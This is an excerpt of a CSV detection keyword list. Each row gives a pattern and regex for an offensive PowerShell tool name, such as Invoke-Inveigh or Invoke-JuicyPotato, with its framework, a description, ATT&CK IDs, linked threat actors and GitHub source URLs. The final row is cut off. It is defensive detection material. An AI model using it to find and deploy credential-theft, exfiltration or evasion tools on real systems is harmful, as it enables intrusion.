"*Invoke-HotFixVulnCheck*",".{0,1000}Invoke\-HotFixVulnCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49088" "*Invoke-HTTPServer*",".{0,1000}Invoke\-HTTPServer.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","A basic web server to use for accessing the emailviewer that is output from Invoke-SearchMailbox","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49089" "*Invoke-IcmpDownload*",".{0,1000}Invoke\-IcmpDownload.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","49090" "*Invoke-IcmpDownload.ps1*",".{0,1000}Invoke\-IcmpDownload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","49091" "*Invoke-IcmpUpload.ps1*",".{0,1000}Invoke\-IcmpUpload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 
- T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","49092" "*Invoke-IkeextCheck*",".{0,1000}Invoke\-IkeextCheck.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","49093" "*Invoke-IkeextExploit*",".{0,1000}Invoke\-IkeextExploit.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","49094" "*Invoke-ImmersiveFileReader*",".{0,1000}Invoke\-ImmersiveFileReader.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Open restricted files with the immersive reader","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49095" "*Invoke-ImpersonateUser*",".{0,1000}Invoke\-ImpersonateUser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49096" "*Invoke-ImpersonateUser*",".{0,1000}Invoke\-ImpersonateUser.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49097" 
"*Invoke-InjectGEvent*",".{0,1000}Invoke\-InjectGEvent.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49098" "*Invoke-InjectGEventAPI*",".{0,1000}Invoke\-InjectGEventAPI.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49099" "*Invoke-InjectOAuthApp -AppName *",".{0,1000}Invoke\-InjectOAuthApp\s\-AppName\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49100" "*Invoke-InjectOAuthApp*",".{0,1000}Invoke\-InjectOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Injects an app registration into the tenant","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49101" "*Invoke-InstalledProgramsCheck*",".{0,1000}Invoke\-InstalledProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49102" "*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 
- T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49103" "*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49104" "*Invoke-Interceptor*",".{0,1000}Invoke\-Interceptor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49105" "*Invoke-Interceptor.ps1*",".{0,1000}Invoke\-Interceptor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49106" "*Invoke-InternalMonologue*",".{0,1000}Invoke\-InternalMonologue.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49107" "*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49108" "*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49109" "*Invoke-InternalMonologue.ps1*",".{0,1000}Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - 
T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49110" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49111" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","49112" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49113" "*Invoke-Inveigh.ps1*",".{0,1000}Invoke\-Inveigh\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - 
TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49114" "*Invoke-InveighRelay*",".{0,1000}Invoke\-InveighRelay.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49115" "*Invoke-InveighRelay.ps1*",".{0,1000}Invoke\-InveighRelay\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49116" "*Invoke-InviteGuest*",".{0,1000}Invoke\-InviteGuest.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Invites a guest user to the tenant","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49117" 
"*Invoke-IronCyclone*",".{0,1000}Invoke\-IronCyclone.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","49118" "*Invoke-IronPython*",".{0,1000}Invoke\-IronPython.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49119" "*Invoke-IronPython.ps1*",".{0,1000}Invoke\-IronPython\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire 
is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49120" "*Invoke-IronPython3*",".{0,1000}Invoke\-IronPython3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - 
T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49121" "*Invoke-IronPython3.ps1*",".{0,1000}Invoke\-IronPython3\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49122" "*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49123" "*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49124" "*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49125" "*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49126" "*Invoke-JuicyPotato*",".{0,1000}Invoke\-JuicyPotato.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 